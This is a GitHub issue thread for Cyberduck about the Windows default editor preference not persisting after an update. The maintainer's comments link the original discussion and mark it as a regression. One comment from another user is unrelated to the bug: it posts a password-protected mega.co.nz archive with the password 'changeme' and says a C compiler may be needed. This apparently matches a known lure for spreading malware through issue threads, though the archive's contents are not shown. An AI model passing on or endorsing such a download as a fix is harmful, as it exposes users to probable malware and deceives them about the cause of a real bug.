### ISSUE TITLE
Default Editor not persisting across reboot (Windows)

### ISSUE THREAD

**Issue by AliveDevil** [iterate-ch/cyberduck#16362]
### Discussed in https://github.com/iterate-ch/cyberduck/discussions/16359

<div type='discussions-op-text'>

<sup>Originally posted by **Nylongbow** September 19, 2024</sup>
We've lost the ability for CD to save any settings within the preferences. Specifically the default editor. This means that in order to edit anything in a non-default editor (like sublime) you have to right click, edit with, more options, select sublime.

This occurred after updating over the summer.

This has been tested on machine with bot restricted student access as well as full admin privileges. The workflow has been dramatically slowed down.

Has anyone else seen this or can give me a hint on a possible fix?
thanks
</div>

**Comment by SAMBILI** [comment]
I think this will help you.
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive codepass: changeme

you may need to install the c compiler

**Comment by AliveDevil** [comment]
Regression #15138
